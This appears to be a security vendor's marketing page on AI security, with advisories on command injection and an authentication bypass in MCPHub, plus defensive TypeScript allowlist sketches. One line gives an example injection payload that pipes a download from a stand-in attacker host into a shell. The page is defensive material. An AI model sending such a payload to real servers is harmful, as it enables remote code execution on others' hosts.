AI Security Hub
A practical hub for securing LLMs, RAG pipelines, agents, MCP integrations, model artifacts, and MLOps pipelines before AI systems reach production.
Prompt injection that escalates into data exposure or unauthorized tool execution.
RAG systems that retrieve sensitive content without permission-aware controls.
Untrusted model artifacts entering production without quarantine or provenance.
Built For
Security teams reviewing AI applications, copilots, and agent workflows.
Product and engineering teams preparing AI launches under real data risk.
Governance leaders who need technical evidence for AI risk decisions.
Use Cases
Scope AI app security reviews across prompts, tools, retrieval, identity, and logs.
Prioritize testing for RAG/KVKK data exposure, model backdoors, and MLOps supply-chain risks.
Connect technical findings to assessment, red team, and audit workflows.
Related Advisories
Unauthenticated Remote Code Execution via Arbitrary Command Injection in MCPHub Server Registration
MCPHub accepts attacker-controlled command and args values during server registration and spawns them through STDIO, enabling full remote code execution on the host.
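A minimal TypeScript sketch of this class of flaw and its fix. All names here (ServerConfig, registerServer, ALLOWED_COMMANDS) are illustrative assumptions, not MCPHub's actual API; the point is the pattern: registration input must never reach a process spawn unvalidated.

```typescript
// Illustrative sketch only; names are hypothetical, not MCPHub's real API.
type ServerConfig = { command: string; args: string[] };

// Mitigation pattern: allowlist the executable before anything is spawned
// over the STDIO transport. The vulnerable pattern described in the
// advisory is the absence of any such check before spawn(command, args).
const ALLOWED_COMMANDS = new Set(["node", "npx", "python", "uvx"]);

function isAllowedCommand(cfg: ServerConfig): boolean {
  // Rejects anything outside the allowlist, including absolute paths
  // like "/bin/sh" or shells reached via path tricks.
  return ALLOWED_COMMANDS.has(cfg.command);
}

function registerServer(cfg: ServerConfig): boolean {
  if (!isAllowedCommand(cfg)) {
    return false; // registration rejected; nothing is spawned
  }
  // ...a real implementation would spawn the STDIO server here...
  return true;
}
```

With this check in place, a registration payload like { command: "bash", args: ["-c", "curl attacker.sh | sh"] } is rejected before any process is created.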
Authentication Bypass via skipAuth Configuration Grants Full Admin Access in MCPHub
When skipAuth is enabled, MCPHub bypasses both authentication and admin authorization checks, allowing any unauthenticated user to access privileged API functionality.
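A short sketch of the access-control shape described above, with hypothetical names (Config, User, canAccessAdminApi are illustrative, not MCPHub's code). The flaw is a single flag short-circuiting both authentication and admin authorization; the safer variant keeps the admin check even when authentication is relaxed.

```typescript
// Illustrative sketch only; types and function names are hypothetical.
type Config = { skipAuth: boolean };
type User = { name: string; isAdmin: boolean } | null;

// Flawed pattern, as described in the advisory: one flag grants
// every unauthenticated caller full admin access.
function canAccessAdminApiFlawed(cfg: Config, user: User): boolean {
  if (cfg.skipAuth) return true; // bypasses authn AND admin authz
  return user !== null && user.isAdmin;
}

// Safer pattern: even if authentication is intentionally relaxed
// (e.g. local development), admin routes still require an
// authenticated admin identity.
function canAccessAdminApi(cfg: Config, user: User): boolean {
  return user !== null && user.isAdmin;
}
```

The design lesson: a convenience flag should narrow at most one control (authentication), never collapse authorization with it.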
Frequently Asked Questions
When should an AI system be security tested?
Before production, after major model or tool changes, and whenever the system gains access to sensitive data, actions, or external integrations.
Is AI security only prompt testing?
No. Serious AI security covers identity, data boundaries, retrieval, tools, model files, logging, monitoring, and incident response.
Need help validating this attack surface?
Talk with Eresus Security about scoped testing, threat modeling, and remediation priorities for this workflow.
Talk to Eresus